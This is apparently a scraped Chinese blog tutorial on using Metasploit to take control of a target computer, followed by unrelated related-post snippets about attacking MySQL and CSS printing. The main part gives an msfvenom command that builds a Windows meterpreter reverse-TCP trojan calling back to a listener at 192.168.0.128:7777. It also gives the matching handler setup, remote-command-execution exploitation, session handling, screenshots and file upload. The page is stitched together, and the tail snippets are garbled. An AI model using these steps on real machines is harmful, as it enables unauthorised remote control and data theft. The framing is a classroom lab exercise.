利用Metasploit控制目標電腦

2022-06-15 21:27:21 字數 1848 閱讀 3255

十月一回家幹活,抽空把以前寫的這篇文章整理下發出來,這個實驗可能是我以後熟練使用kali的乙個契機。

命令:msfdb init:初始化資料庫

msfconsole:啟動(啟動後就進入msf命令列介面)

輸完上面2條命令之後可以輸入db_status可以檢視msf是否連線上資料庫。

metasploit利用kali的nmap進行的埠掃瞄

多敲幾遍自然而然就記住了。

根據不同目標的系統生成不同的木馬,木馬在目標機器一執行就可以獲取shell。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.128 lport=7777 -f exe > abc.exe //在輸入命令的地方生成乙個存有本地ip與監聽埠的abc.exe的木馬檔案,這裡的木馬是基於windows系統的。

給飛彈加核彈頭。

新開乙個視窗進入msf命令列模式,輸入命令set payload windows/meterpreter/reverse_tcp。輸入show options進行設定位址與監聽埠。

1、set lhost 本機ip,

2、set lport 7777(生成木馬的配置的埠號),

3、run。

然後把木馬放到目標機器,啟動後就會被控制進入到

攻擊方法

課上是利用遠端命令執行漏洞。

在msf裡邊呼叫其他模組,這個模組是生成可以拿到對方許可權的一條命令,監聽埠預設4444.

關鍵內容設定好之後點run,複製生成的payload到頁面執行後就拿到shell了。

在sessions裡面選擇要使用的許可權,這是獲取的python的許可權不是完整的許可權。

下面的截圖是利用別的語言生成的拿許可權**,只要目標機器能執行,我們就能拿到許可權。

監聽埠被占用後,就不能再用那個埠監聽別人了,有幾種方法。

1、set lport 6666(使用別的埠)

2、jobs -k 0(號要對應上,殺死這個任務)

3、sessions -k 2(號對應上,殺死session)

命令執行後,等待**shell即可。

獲取截圖

上傳檔案

利用Metasploit來攻擊Mysql

mysql是乙個關係型資料庫管理系統,由瑞典 mysql ab 公司開發,目前屬於 oracle 公司。mysql是中小型 的首選資料庫 nmap的指紋識別可以精確的判斷資料庫的版本號,而metasploit提供的模組的特點就是能夠判斷資料庫是否允許外鏈 如果允許外鏈則可以顯示版本號 這個模組沒有預...

利用CSS控制列印

放在這裡,算是乙個備份 每頁都有的表頭 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 每頁都有...

利用CSS控制列印

利用css控制列印 放在這裡,算是乙個備份 每頁都有的表頭 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 內容 ...